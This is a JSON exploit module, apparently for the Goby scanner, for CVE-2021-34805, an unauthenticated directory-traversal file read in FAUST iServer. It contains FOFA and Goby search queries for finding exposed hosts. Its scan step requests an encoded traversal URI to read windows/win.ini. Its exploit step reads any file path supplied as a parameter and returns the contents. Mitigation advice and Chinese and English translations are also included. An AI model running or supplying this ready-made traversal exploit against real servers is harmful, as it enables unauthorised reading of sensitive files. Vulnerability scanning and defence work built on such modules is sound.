{ "Name": "FAUST iServer File Read (CVE-2021-34805)", "Description": "

FAUST iServer is a product of the German company Land Software for bringing Faust, Faust Entry and Lidos databases to the intranet and the Internet.

FAUST iServer 9.0.017.017.1 - 9.0.018.018.4 has an arbitrary file read vulnerability through which unauthenticated users can obtain sensitive information.

", "Product": "FAUST iServer", "Homepage": "http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver", "DisclosureDate": "2022-03-24", "Author": "abszse", "FofaQuery": "(banner=\"iServer\" || header=\"iServer\") && title!=\"SuperMap\"", "GobyQuery": "(banner=\"iServer\" || header=\"iServer\") && title!=\"SuperMap\"", "Level": "2", "Impact": "

FAUST iServer 9.0.017.017.1 - 9.0.018.018.4 has an arbitrary file read vulnerability through which unauthenticated users can obtain sensitive information.

", "Recommendation": "

Do not expose the service to the public network; restrict access with a whitelist on security devices such as firewalls.

Watch for updates on the official website and apply them promptly: http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver

", "References": [ "https://packetstormsecurity.com/files/165701/FAUST-iServer-9.0.018.018.4-Local-File-Inclusion.html" ], "Is0day": false, "HasExp": true, "ExpParams": [ { "name": "cmd", "type": "input", "value": "%5cwindows%5cwin.ini", "show": "" } ], "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "bit app support", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "extensions", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "fonts", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e{{{cmd}}}", "follow_redirect": false, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" } ] }, "SetVariable": [ "output|lastbody||" ] } ], "Tags": [ "Directory Traversal" ], "VulType": [ "Directory Traversal" ], "CVEIDs": [ "CVE-2021-34805" ], "CNNVD": [ "CNNVD-202201-2281" ], "CNVD": [ "" ], "CVSSScore": "7.5", "Translation": { "CN": { "Name": "FAUST iServer 任意文件读取漏洞 (CVE-2021-34805)", "Product": "FAUST iServer", "Description": "

Faust Iserver是德国Land Software公司的用于将 Faust、Faust Entry 和 Lidos 数据库带到内联网和互联网上。

FAUST iServer 9.0.017.017.1- 9.0.018.018.4版本存在任意文件读取漏洞,未授权用户可获取敏感信息。

", "Recommendation": "

禁止暴露到公网,可通过防火墙等安全设备设置访问的白名单。

及时关注官网更新:http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver

", "Impact": "

FAUST iServer 9.0.017.017.1- 9.0.018.018.4版本存在任意文件读取漏洞,未授权用户可获取敏感信息。

", "VulType": [ "目录穿越/遍历" ], "Tags": [ "目录穿越/遍历" ] }, "EN": { "Name": "FAUST iServer File Read (CVE-2021-34805)", "Product": "FAUST iServer", "Description": "

FAUST iServer is a product of the German company Land Software for bringing Faust, Faust Entry and Lidos databases to the intranet and the Internet.

FAUST iServer 9.0.017.017.1 - 9.0.018.018.4 has an arbitrary file read vulnerability through which unauthenticated users can obtain sensitive information.

", "Recommendation": "

Do not expose the service to the public network; restrict access with a whitelist on security devices such as firewalls.

Watch for updates on the official website and apply them promptly: http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver

", "Impact": "

FAUST iServer 9.0.017.017.1 - 9.0.018.018.4 has an arbitrary file read vulnerability through which unauthenticated users can obtain sensitive information.

", "VulType": [ "Directory Traversal" ], "Tags": [ "Directory Traversal" ] } }, "AttackSurfaces": { "Application": null, "Support": null, "Service": null, "System": null, "Hardware": null } }